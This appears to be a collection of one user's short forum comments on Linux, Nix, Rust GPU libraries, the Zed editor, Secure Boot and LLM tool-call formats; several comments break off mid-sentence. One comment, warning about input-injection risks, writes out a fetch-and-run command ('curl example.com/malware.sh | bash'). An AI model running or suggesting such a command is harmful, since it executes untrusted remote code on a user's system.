It shouldn't be as tightly integrated into the editor as it is. Zed uses it for a lot of things, including to install various language servers and other things via NPM, which is just nasty.

I'm concerned about relicensing. See HashiCorp.

I like to think of the relationship between Zed and Zedless more like Chromium and ungoogled-chromium.

iroh is meant to be this library, but there is also libp2p, which existed before iroh.

That's the point of ICDs. That's why you link to e.g. vulkan-loader instead of directly to the driver library.

Rust GPU libraries such as wgpu and ash rely on external libraries such as vulkan-loader to load the actual ICDs, but for some reason Rust people really love dlopening them instead of linking to them normally. Then it's up to the consu

It would be great if Rust people learned how to properly load GPU libraries first.

That's true for this and many other features of Zed. For example, telemetry can be disabled with a simple switch. However, I feel deeply uncomfortable knowing that my editor is ready to report every file I open, commit I make, code act

Surely this has to be a joke. If I wanted to write web stuff in XML, I would just write HTML.

Using "Secure Boot" with MS keys is not real Secure Boot. It's "Microsoft decides what you may boot". Enrolling your own keys should be the standard way of operating. shim is a joke.

Bad habits do happen. I forced myself out of `sudo su` and into `sudo -i` by configuring my sudo rule to allow any command except `su`.

The inference engine can do whatever it wants. This is already the case. The actual format of the tool call text varies by model, and the inference engine handles the translation from/to the JSON representation, that's the least o

The actual API call is still going to be JSON. How do you deal with that? Pack your Python function definitions into an array of huge opaque strings? And who would want to write a parser for that?

They literally vendored llama.cpp and they STILL called it "Ollama for *". Georgi cannot be vindicated hard enough.

It's a problem of nixpkgs. It would be cool to have an Alpine-like alternative package set focused on minimal package size.

Madaidan's articles are well-known to be centered around "security at all costs", and often at the cost of user freedom. That's just not a realistic take when it comes to privacy. What good is absolute security if all it

OCI isn't a particularly good image format, the only thing it has going for itself is that it's the thing Docker uses. I would absolutely not be surprised if 90% of future bootc OCI images are built with Dockerfiles.

AFAIK Twitch already sends a simple "there's supposed to be an ad here" video stream during ad breaks when viewing through a non-web player. I'd take 30 seconds of silence over 30 seconds of advertisements any day of the

Why shoehorn Docker into this as a build sandbox instead of writing an alternative package set for Nix?

Nice. This does some things very similarly to Hyprspace[1]. The core idea is the same: Receive some bytes from a TUN device, shove them into a network socket, and vice versa. Hyprspace uses libp2p to manage the outer connections between VPN

You can grab screenshots, manipulate windows, and inject keyboard and mouse inputs. Find the application menu, open a terminal, curl example.com/malware.sh | bash and hide the window.

That would completely defeat the security aspect. At that point, you're only using Docker as a software distribution method, which it's terrible at.

Completely false. Building from the actual source code is strongly preferred and usually easier than patching a binary that wasn't built for such an environment.

You ditched NixOS for the very reason it was created. Not being able to run binaries with missing libraries is a feature. The idea is to make you aware of your implicit dependencies, and to force you to make them explicit. This makes me won
